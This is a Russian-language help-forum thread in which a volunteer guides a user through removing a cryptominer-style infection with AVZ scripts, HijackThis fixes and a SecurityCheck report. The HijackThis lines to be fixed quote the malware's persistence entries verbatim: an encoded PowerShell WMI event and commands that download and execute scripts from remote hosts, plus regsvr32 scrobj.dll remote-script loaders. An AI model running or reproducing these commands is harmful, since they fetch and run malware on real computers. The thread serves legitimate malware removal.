Решена mysa,mysa1,mysa2,mysa3,ok

Статус
В этой теме нельзя размещать новые ответы.

debufff

Новый пользователь
Сообщения
8
Реакции
0
Появились задания Mysa,Mysa1,Mysa2,Mysa3,ok в планировщике заданий когда удаляю появляются опять. Браузер при запуске открывает страницу about:blank хотя стоит новая вкладка. Сеть иногда просто пропадает. И при запуске пк через 2 минуты появляется на пол секунды cmd которая сворачивает приложения.
 
1. Скачайте утилиту на рабочий стол.
2. Запустите KVRT и подтвердите согласие с условиями использования
3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"
4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите "Ок"
5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.
6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме

А после нужны логи https://safezone.cc/pravila/
 
Вроде это
 

Вложения

  • Reports.zip
    2.7 KB · Просмотры: 1
  • Addition.txt
    23.8 KB · Просмотры: 1
  • CollectionLog-2019.07.04-22.54.zip
    54.3 KB · Просмотры: 1
  • FRST.txt
    32.3 KB · Просмотры: 2
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Users\Серго\AppData\Local\Pupdbrowser\Pupdbrowser.exe','');
 QuarantineFile('c:\windows\update.exe>','');
 QuarantineFile('c:\windows\debug\item.dat','');
 QuarantineFile('c:\windows\debug\item.dat>','');
 QuarantineFile('c:\windows\help\lsmosee.exe>','');
 QuarantineFile('c:\windows\debug\ok.dat','');
 QuarantineFile('C:\Users\Серго\AppData\Roaming\nssm.exe','');
 DeleteFile('C:\Users\Серго\AppData\Roaming\nssm.exe','32');
 DeleteFile('c:\windows\debug\ok.dat','32');
 DeleteFile('c:\windows\help\lsmosee.exe>','32');
 DeleteFile('c:\windows\debug\item.dat>','32');
 DeleteFile('c:\windows\debug\item.dat','32');
 DeleteFile('c:\windows\update.exe>','32');
 DeleteFile('C:\Users\Серго\AppData\Local\Pupdbrowser\Pupdbrowser.exe','32');
 DeleteSchedulerTask('Pupdbrowser');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
 RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start','x32');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
 
ошибка какая-то
Снимок.PNG
 
Используйте AVZ из папки автологера, а не устаревшую версию 4.46
 
2019.10.17_quarantine_6736e374275c905c15846238569e4c23.7z
 
вот, в HiJackThis О25 строки нет
 

Вложения

  • CollectionLog-2019.10.17-13.01.zip
    33 KB · Просмотры: 1
"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll (HKLM) (2019/10/03)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)


Что с проблемой после фикса?
 
Вроде все нормально, спасибо за помощь
 
вот
 

Вложения

  • SecurityCheck.txt
    8.6 KB · Просмотры: 5
Исправьте по возможности
Системный диск: C: ФС: [NTFS] Емкость: [37.3 Гб] Занято: [25.6 Гб] Свободно: [11.7 Гб]
------------------------------- [ Windows ] -------------------------------
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено
------------------------------- [ HotFix ] --------------------------------
HotFix KB3020369 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4484071 Внимание! Скачать обновления
HotFix KB4512486 Внимание! Скачать обновления
HotFix KB4519976 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Microsoft .NET Framework 4.5.2 v.4.5.51209 Внимание! Скачать обновления
 
Файл подкачки минимум какой выставить на диске С?
 
Оставьте размер по выбору системы, будет лучше.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу